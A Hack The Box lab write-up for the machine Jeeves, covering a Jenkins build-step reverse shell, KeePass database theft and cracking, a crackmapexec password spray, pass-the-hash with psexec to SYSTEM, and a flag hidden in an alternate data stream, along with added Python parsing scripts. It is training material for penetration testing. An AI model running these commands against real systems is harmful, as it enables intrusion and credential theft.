HTB Jeeves done
Jeeves
OS:
Windows
Technology:
ASP.NET
MS SQL Server 2005
Microsoft-IIS/10.0
Jetty: 9.4
Jenkins ver. 2.87
IP Address:
10.10.10.63
Open ports:
80/tcp open http Microsoft IIS httpd 10.0
135/tcp open msrpc Microsoft Windows RPC
445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
50000/tcp open http Jetty 9.4.z-SNAPSHOT
Users and passwords:
After cracking the KeePass database
L:CEH
P: moonshine1
Nmap
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_Jeeves]
└─$ sudo nmap -A -sV --script=default -p- --open -oA 10.10.10.63_nmap 10.10.10.63 ; cat 10.10.10.63_nmap.nmap | grep "tcp.*open"
[sudo] password for kali:
Starting Nmap 7.93 ( https://nmap.org ) at 2024-03-28 12:59 CET
Nmap scan report for 10.10.10.63
Host is up (0.038s latency).
Not shown: 65531 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: Ask Jeeves
|_http-server-header: Microsoft-IIS/10.0
135/tcp open msrpc Microsoft Windows RPC
445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
50000/tcp open http Jetty 9.4.z-SNAPSHOT
|_http-title: Error 404 Not Found
|_http-server-header: Jetty(9.4.z-SNAPSHOT)
Open website: http://10.10.10.63/
We open the website and find a search field (not working); submitting it shows an error page
http://10.10.10.63/
---
http://10.10.10.63/error.html?
Open website: http://10.10.10.63:50000
Nothing interesting here
http://10.10.10.63:50000
ffuf: http://10.10.10.63/
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_Jeeves]
└─$ ffuf -u http://10.10.10.63/FUZZ -c -w /usr/share/wordlists/dirb/big.txt -ac -recursion -recursion-depth=2 -o 10.10.10.63_ffuz -of all -e .php,.html,.txt
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://10.10.10.63/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/dirb/big.txt
:: Extensions : .php .html .txt
:: Output file : 10.10.10.63_ffuz.{json,ejson,html,md,csv,ecsv}
:: File format : all
:: Follow redirects : false
:: Calibration : true
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
Index.html [Status: 200, Size: 503, Words: 38, Lines: 17, Duration: 42ms]
error.html [Status: 200, Size: 50, Words: 4, Lines: 2, Duration: 95ms]
index.html [Status: 200, Size: 503, Words: 38, Lines: 17, Duration: 105ms]
:: Progress: [81876/81876] :: Job [1/1] :: 796 req/sec :: Duration: [0:02:33] :: Errors: 0 ::
ffuf: http://10.10.10.63:50000
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_Jeeves]
└─$ ffuf -u http://10.10.10.63:50000/FUZZ -c -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -ac -o 10.10.10.63_50000_ffuz -of all -e .php,.html,.txt
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://10.10.10.63:50000/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
:: Extensions : .php .html .txt
:: Output file : 10.10.10.63_50000_ffuz.{json,ejson,html,md,csv,ecsv}
:: File format : all
:: Follow redirects : false
:: Calibration : true
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
askjeeves [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 39ms]
:: Progress: [882240/882240] :: Job [1/1] :: 975 req/sec :: Duration: [0:19:57] :: Errors: 0 ::
Open website: http://10.10.10.63:50000/askjeeves/
We found Jenkins ver. 2.87
http://10.10.10.63:50000/askjeeves/
Reverse shell via a build job
Create a new job
Click "New Item" --> "Enter an item name": revshell --> "Freestyle project" --> OK
http://10.10.10.63:50000/askjeeves/view/all/newJob
Next, configure the build steps
"Build" --> "Add build step" and enter the payload
powershell -e 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
and click Save
http://10.10.10.63:50000/askjeeves/job/revshell/configure
Build job
Click "Build Now" on the dashboard
http://10.10.10.63:50000/askjeeves/job/revshell/
Run netcat from Kali
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_Jeeves]
└─$ rlwrap nc -lvnp 445
listening on [any] 445 ...
connect to [10.10.14.6] from (UNKNOWN) [10.10.10.63] 49682
PS C:\Users\Administrator\.jenkins\workspace\revshell> whoami /all
USER INFORMATION
----------------
User Name SID
============== ===========================================
jeeves\kohsuke S-1-5-21-2851396806-8246019-2289784878-1001
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
==================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\SERVICE Well-known group S-1-5-6 Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account Well-known group S-1-5-113 Mandatory group, Enabled by default, Enabled group
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label S-1-16-12288
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeShutdownPrivilege Shut down the system Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeUndockPrivilege Remove computer from docking station Disabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
SeTimeZonePrivilege Change the time zone Disabled
PS C:\Users\Administrator\.jenkins\workspace\revshell>
Read flag: user.txt
PS C:\Users\Administrator\.jenkins\workspace\revshell> cd C:\Users\
PS C:\Users> dir
Directory: C:\Users
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 11/3/2017 11:07 PM Administrator
d----- 11/5/2017 9:17 PM DefaultAppPool
d----- 11/3/2017 11:19 PM kohsuke
d-r--- 10/25/2017 4:46 PM Public
PS C:\Users> cd kohsuke
PS C:\Users\kohsuke> cd Desktop
PS C:\Users\kohsuke\Desktop> dir
Directory: C:\Users\kohsuke\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 11/3/2017 11:22 PM 32 user.txt
PS C:\Users\kohsuke\Desktop> type user.txt
e3232272596fb47950d59c4cf1e7066a
PS C:\Users\kohsuke\Desktop>
Find keepass database: CEH.kdbx
PS C:\Users\kohsuke> dir
Directory: C:\Users\kohsuke
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 11/3/2017 10:51 PM .groovy
d-r--- 11/3/2017 11:15 PM Contacts
d-r--- 11/3/2017 11:19 PM Desktop
d-r--- 11/3/2017 11:18 PM Documents
d-r--- 11/3/2017 11:15 PM Downloads
d-r--- 11/3/2017 11:15 PM Favorites
d-r--- 11/3/2017 11:22 PM Links
d-r--- 11/3/2017 11:15 PM Music
d-r--- 11/3/2017 11:22 PM OneDrive
d-r--- 11/4/2017 3:10 AM Pictures
d-r--- 11/3/2017 11:15 PM Saved Games
d-r--- 11/3/2017 11:16 PM Searches
d-r--- 11/3/2017 11:15 PM Videos
PS C:\Users\kohsuke> cd Documents
PS C:\Users\kohsuke\Documents> dir
Directory: C:\Users\kohsuke\Documents
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 9/18/2017 1:43 PM 2846 CEH.kdbx
Download the KeePass database to Kali
1 Copy the database to the Jenkins workspace folder
PS C:\Users\kohsuke\Documents> dir C:\Users\Administrator\.jenkins\workspace
Directory: C:\Users\Administrator\.jenkins\workspace
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 3/28/2024 2:31 PM revshell
d----- 3/27/2024 6:34 PM testJankins1
PS C:\Users\kohsuke\Documents> copy CEH.kdbx C:\Users\Administrator\.jenkins\workspace\revshell\
PS C:\Users\kohsuke\Documents>
---
2 Download the file via Jenkins
Web:
http://10.10.10.63:50000/askjeeves/job/revshell/ws/
Command line:
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_Jeeves]
└─$ wget http://10.10.10.63:50000/askjeeves/job/revshell/ws/CEH.kdbx
--2024-03-28 15:14:53-- http://10.10.10.63:50000/askjeeves/job/revshell/ws/CEH.kdbx
Connecting to 10.10.10.63:50000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2846 (2.8K) [application/octet-stream]
Saving to: ‘CEH.kdbx’
CEH.kdbx 100%[==============================================>] 2.78K --.-KB/s in 0s
2024-03-28 15:14:53 (77.4 MB/s) - ‘CEH.kdbx’ saved [2846/2846]
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_Jeeves]
└─$ file CEH.kdbx
CEH.kdbx: Keepass password database 2.x KDBX
Cracking the KeePass database - keepass2john
1 Extract the hash with keepass2john
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_Jeeves]
└─$ keepass2john CEH.kdbx | tee CEH.kdbx.hash
CEH:$keepass$*2*6000*0*1af405cc00f979ddb9bb387c4594fcea2fd01a6a0757c000e1873f3c71941d3d*3869fe357ff2d7db1555cc668d1d606b1dfaf02b9dba2621cbe9ecb63c7a4091*393c97beafd8a820db9142a6a94f03f6*b73766b61e656351c3aca0282f1617511031f0156089b6c5647de4671972fcff*cb409dbc0fa660fcffa4f1cc89f728b68254db431a21ec33298b612fe647db48
---
2 Crack it with john
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_Jeeves]
└─$ john CEH.kdbx.hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (KeePass [SHA256 AES 32/64])
Cost 1 (iteration count) is 6000 for all loaded hashes
Cost 2 (version) is 2 for all loaded hashes
Cost 3 (algorithm [0=AES 1=TwoFish 2=ChaCha]) is 0 for all loaded hashes
Will run 6 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
moonshine1 (CEH)
1g 0:00:01:36 DONE (2024-03-28 15:22) 0.01033g/s 568.1p/s 568.1c/s 568.1C/s nando1..molly21
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
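The john output above reports the cost parameters it reads from the keepass2john line: the key-transformation iteration count (6000), the format version (2) and the cipher code (0 = AES). The script below is an added example and not part of the original writeup. It parses a keepass2john line into those fields, flags an iteration count below a policy threshold, and estimates how long a wordlist run would take at the candidate rate john printed (568.1 c/s). The sample line is constructed with placeholder hex of the same field lengths as a real KDBX 2.x line; the 60000-round threshold and the rockyou line count are assumptions used for illustration, not values from the page.

```python
"""Inspect the header fields keepass2john exposes and judge KDF strength.

Added example (not from the original writeup). SAMPLE_LINE is constructed:
the hex blobs are placeholders with the same lengths as a real
keepass2john line for a KDBX 2.x file.
"""
import re

# Constructed sample in keepass2john's layout:
# <label>:$keepass$*<version>*<rounds>*<algorithm>*<header hex fields...>
SAMPLE_LINE = (
    "CEH:$keepass$*2*6000*0*" + "11" * 32 + "*" + "22" * 32 + "*" + "33" * 16
    + "*" + "44" * 32 + "*" + "55" * 32
)

# Algorithm codes exactly as john labels them in its cost output.
ALGORITHMS = {"0": "AES", "1": "TwoFish", "2": "ChaCha"}

# Assumed policy threshold for the key-transformation rounds; not a page value.
MIN_KDF_ROUNDS = 60000

HEX_FIELD = re.compile(r"^[0-9a-fA-F]+$")


def parse_keepass2john(line):
    """Split a keepass2john line into label, version, rounds, algorithm.

    The remaining header fields (seeds, IV, check values) are returned as
    opaque hex strings; only their well-formedness is checked.
    """
    line = line.strip()
    if line.startswith("$keepass$"):
        label, body = "", line
    else:
        label, sep, rest = line.partition(":$keepass$")
        if not sep:
            raise ValueError("not a keepass2john line")
        body = "$keepass$" + rest
    parts = body.split("*")
    if len(parts) < 4 or parts[0] != "$keepass$":
        raise ValueError("unexpected keepass2john layout")
    if not all(HEX_FIELD.match(f) for f in parts[4:]):
        raise ValueError("non-hex header field")
    return {
        "label": label,
        "version": parts[1],
        "rounds": int(parts[2]),
        "algorithm": ALGORITHMS.get(parts[3], "unknown(" + parts[3] + ")"),
        "header_fields": parts[4:],
    }


def is_weak_kdf(info, min_rounds=MIN_KDF_ROUNDS):
    """True when the file's transformation rounds fall below the policy."""
    return info["rounds"] < min_rounds


def wordlist_seconds(candidates, rate_per_second):
    """Seconds needed to try `candidates` passwords at john's reported c/s."""
    return candidates / rate_per_second


if __name__ == "__main__":
    info = parse_keepass2john(SAMPLE_LINE)
    print(info["label"], info["version"], info["rounds"], info["algorithm"])
    print("weak KDF:", is_weak_kdf(info))
    # Assumed wordlist size (approximate rockyou.txt line count) at the rate
    # john reported above; the cost scales linearly with the rounds field.
    print("hours for wordlist:", round(wordlist_seconds(14_344_392, 568.1) / 3600, 1))
```

At 6000 rounds the whole wordlist fits in a few hours on one laptop; raising the rounds by 10x raises the attacker's cost by the same factor, which is the lever a vault owner controls.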
Read all records from the database
1 Open the database in KeePassXC and export all records to XML
Menu
"Database" --> Export --> "XML File"
---
2 Dump all passwords from the command line
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_Jeeves]
└─$ cat CEH_export.xml | grep -i "ProtectInMemory" | grep -Po "(?=\"\>).*(?=</)" | tr -d '>"' | sort | uniq > passwords.txt
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_Jeeves]
└─$ cat passwords.txt
12345
aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00
F7WhTrSFDKB6sxHU1cUn
lCEUnYPjNfIuPZSzOySA
Password
pwndyouall!
S1TjAtJHKsugh9oC4VZl
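The grep pipeline above pulls every ProtectInMemory value out of the export but loses which entry and user name each value belongs to. The parser below is an added example, not code from the writeup: it walks the KeePass XML export with ElementTree, keeps title and user name next to each protected value, optionally includes History revisions (which KeePassXC also exports), and flags values shaped like an LM:NT hash pair, the kind of material that turned up in this vault. The XML is a constructed sample in the layout of a KeePassXC "Export -> XML File"; its titles, user names and values are placeholders, not the contents of CEH.kdbx.

```python
"""List entries of a KeePass XML export with their protected values.

Added example (not from the original writeup). SAMPLE_XML is a constructed
export in KeePassXC's XML layout; every value in it is a placeholder.
"""
import re
import xml.etree.ElementTree as ET

SAMPLE_XML = """<KeePassFile>
  <Root>
    <Group>
      <Name>Root</Name>
      <Entry>
        <String><Key>Title</Key><Value>Backup server</Value></String>
        <String><Key>UserName</Key><Value>backup</Value></String>
        <String><Key>Password</Key><Value ProtectInMemory="True">example-pass-1</Value></String>
      </Entry>
      <Entry>
        <String><Key>Title</Key><Value>Administrator hash</Value></String>
        <String><Key>UserName</Key><Value>Administrator</Value></String>
        <String><Key>Password</Key><Value ProtectInMemory="True">aad3b435b51404eeaad3b435b51404ee:00000000000000000000000000000000</Value></String>
        <History>
          <Entry>
            <String><Key>Title</Key><Value>Administrator hash</Value></String>
            <String><Key>UserName</Key><Value>Administrator</Value></String>
            <String><Key>Password</Key><Value ProtectInMemory="True">old-example-pass</Value></String>
          </Entry>
        </History>
      </Entry>
      <Group>
        <Name>Web</Name>
        <Entry>
          <String><Key>Title</Key><Value>Jenkins admin</Value></String>
          <String><Key>UserName</Key><Value>jenkins</Value></String>
          <String><Key>Password</Key><Value ProtectInMemory="True">example-pass-2</Value></String>
        </Entry>
      </Group>
    </Group>
  </Root>
</KeePassFile>
"""

# 32 hex LM hash, colon, 32 hex NT hash: the shape of the value found above.
NTLM_PAIR = re.compile(r"^[0-9a-fA-F]{32}:[0-9a-fA-F]{32}$")


def entry_fields(entry):
    """Map each <String><Key> of an entry to its <Value> text."""
    fields = {}
    for s in entry.findall("String"):
        key = s.findtext("Key")
        val = s.find("Value")
        fields[key] = (val.text or "") if val is not None else ""
    return fields


def iter_entries(root, include_history=False):
    """Yield (fields, is_history) for every entry in every group, recursively.

    iter("Group") visits nested groups; findall("Entry") takes only direct
    children, so each entry is yielded exactly once.
    """
    for group in root.iter("Group"):
        for entry in group.findall("Entry"):
            yield entry_fields(entry), False
            if include_history:
                for old in entry.findall("History/Entry"):
                    yield entry_fields(old), True


def load_export(xml_text, include_history=False):
    """Parse the export and return one row per entry (and revision)."""
    root = ET.fromstring(xml_text)
    rows = []
    for fields, is_history in iter_entries(root, include_history):
        pw = fields.get("Password", "")
        rows.append({
            "title": fields.get("Title", ""),
            "user": fields.get("UserName", ""),
            "password": pw,
            "history": is_history,
            "looks_like_ntlm": bool(NTLM_PAIR.match(pw)),
        })
    return rows


def unique_secrets(rows):
    """Same result as the writeup's sort | uniq, but from parsed rows."""
    return sorted({r["password"] for r in rows if r["password"]})


if __name__ == "__main__":
    for r in load_export(SAMPLE_XML, include_history=True):
        tag = " [history]" if r["history"] else ""
        flag = " <-- NTLM hash pair stored as a password" if r["looks_like_ntlm"] else ""
        print(f'{r["title"]} / {r["user"]}{tag}{flag}')
```

Keeping the title and user name attached to each value is what lets a vault audit say which account a weak or hash-shaped entry belongs to; the raw value list above cannot.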
Crackmapexec
Crackmapexec with passwords from the file
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_Jeeves]
└─$ crackmapexec smb 10.10.10.63 -u Administrator -p passwords.txt
SMB 10.10.10.63 445 JEEVES [*] Windows 10 Pro 10586 x64 (name:JEEVES) (domain:Jeeves) (signing:False) (SMBv1:True)
SMB 10.10.10.63 445 JEEVES [-] Jeeves\Administrator:12345 STATUS_LOGON_FAILURE
SMB 10.10.10.63 445 JEEVES [-] Jeeves\Administrator:aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00 STATUS_LOGON_FAILURE
SMB 10.10.10.63 445 JEEVES [-] Jeeves\Administrator:F7WhTrSFDKB6sxHU1cUn STATUS_LOGON_FAILURE
SMB 10.10.10.63 445 JEEVES [-] Jeeves\Administrator:lCEUnYPjNfIuPZSzOySA STATUS_LOGON_FAILURE
SMB 10.10.10.63 445 JEEVES [-] Jeeves\Administrator:Password STATUS_LOGON_FAILURE
SMB 10.10.10.63 445 JEEVES [-] Jeeves\Administrator:pwndyouall! STATUS_LOGON_FAILURE
SMB 10.10.10.63 445 JEEVES [-] Jeeves\Administrator:S1TjAtJHKsugh9oC4VZl STATUS_LOGON_FAILURE
Crackmapexec with the NTLM hash
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_Jeeves]
└─$ crackmapexec smb 10.10.10.63 -u Administrator -H aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00
SMB 10.10.10.63 445 JEEVES [*] Windows 10 Pro 10586 x64 (name:JEEVES) (domain:Jeeves) (signing:False) (SMBv1:True)
SMB 10.10.10.63 445 JEEVES [+] Jeeves\Administrator:e0fb1fb85756c24235ff238cbe81fe00 (Pwn3d!)
Log in as Administrator and get nt authority\system
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_Jeeves]
└─$ python3 /home/kali/.local/bin/psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00 Administrator@10.10.10.63 cmd.exe
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Requesting shares on 10.10.10.63.....
[*] Found writable share ADMIN$
[*] Uploading file oPEtBjIR.exe
[*] Opening SVCManager on 10.10.10.63.....
[*] Creating service lWGu on 10.10.10.63.....
[*] Starting service lWGu.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.10586]
(c) 2015 Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
nt authority\system
Read flag: root.txt
Read file: hm.txt
C:\Windows\system32> cd C:\Users\Administrator\Desktop
C:\Users\Administrator\Desktop> dir
Volume in drive C has no label.
Volume Serial Number is 71A1-6FA1
Directory of C:\Users\Administrator\Desktop
11/08/2017 10:05 AM <DIR> .
11/08/2017 10:05 AM <DIR> ..
12/24/2017 03:51 AM 36 hm.txt
11/08/2017 10:05 AM 797 Windows 10 Update Assistant.lnk
2 File(s) 833 bytes
2 Dir(s) 2,634,489,856 bytes free
C:\Users\Administrator\Desktop> type hm.txt
The flag is elsewhere. Look deeper.
Find the root.txt flag via alternate data streams
C:\Users\Administrator\Desktop> dir /R
Volume in drive C has no label.
Volume Serial Number is 71A1-6FA1
Directory of C:\Users\Administrator\Desktop
11/08/2017 10:05 AM <DIR> .
11/08/2017 10:05 AM <DIR> ..
12/24/2017 03:51 AM 36 hm.txt
34 hm.txt:root.txt:$DATA
11/08/2017 10:05 AM 797 Windows 10 Update Assistant.lnk
2 File(s) 833 bytes
2 Dir(s) 2,634,489,856 bytes free
C:\Users\Administrator\Desktop> more < hm.txt:root.txt
afbc5bd4b615a60648cec41c6ac92530
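A plain `dir` hides the stream entirely; only `dir /R` lists the `name:stream:$DATA` rows. The script below is an added example, not part of the original writeup: it parses `dir /R` output, pulls out every named stream with its size, and separates streams Windows creates on its own (Zone.Identifier, the mark-of-the-web) from ones that deserve a look, which is the check a defender runs when hunting for data tucked into ADS. The sample output is constructed in cmd.exe's `dir /R` layout; it repeats the hm.txt rows from the session above and adds a Zone.Identifier stream as a benign control.

```python
"""Flag alternate data streams in `dir /R` output.

Added example (not from the original writeup). SAMPLE_OUTPUT is constructed
in the layout cmd.exe's `dir /R` prints; the Zone.Identifier row is made up
as a benign control.
"""
import re

SAMPLE_OUTPUT = r"""
 Volume in drive C has no label.
 Volume Serial Number is 71A1-6FA1

 Directory of C:\Users\Administrator\Desktop

11/08/2017  10:05 AM    <DIR>          .
11/08/2017  10:05 AM    <DIR>          ..
12/24/2017  03:51 AM                36 hm.txt
                                    34 hm.txt:root.txt:$DATA
11/08/2017  10:05 AM               797 Windows 10 Update Assistant.lnk
                                    26 Windows 10 Update Assistant.lnk:Zone.Identifier:$DATA
               2 File(s)            833 bytes
               2 Dir(s)   2,634,489,856 bytes free
"""

# Streams Windows writes routinely; anything outside this set gets reviewed.
BENIGN_STREAMS = {"Zone.Identifier"}

# A stream row has no date, just a size and then file:stream:$DATA.
# Windows file names cannot contain ':', so splitting on it is unambiguous.
STREAM_LINE = re.compile(r"^\s*([\d,]+)\s+([^:]+):([^:]+):\$DATA\s*$")


def parse_streams(dir_r_output):
    """Return (file_name, stream_name, size) for every named stream listed."""
    found = []
    for line in dir_r_output.splitlines():
        m = STREAM_LINE.match(line)
        if m:
            size = int(m.group(1).replace(",", ""))
            found.append((m.group(2), m.group(3), size))
    return found


def suspicious_streams(streams, benign=BENIGN_STREAMS):
    """Drop streams Windows creates by itself; keep the rest for review."""
    return [s for s in streams if s[1] not in benign]


if __name__ == "__main__":
    for name, stream, size in suspicious_streams(parse_streams(SAMPLE_OUTPUT)):
        print(f"review: {name}:{stream} ({size} bytes)")
```

On a live host the same inventory comes from PowerShell's `Get-Item -Path <file> -Stream *`, which lists each stream with its length; the parser above is for the case where all you have is captured `dir /R` text from a session log.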
References
[Windows ::DATA Alternate Data Stream](https://owasp.org/www-community/attacks/Windows_alternate_data_stream)
Lessons Learned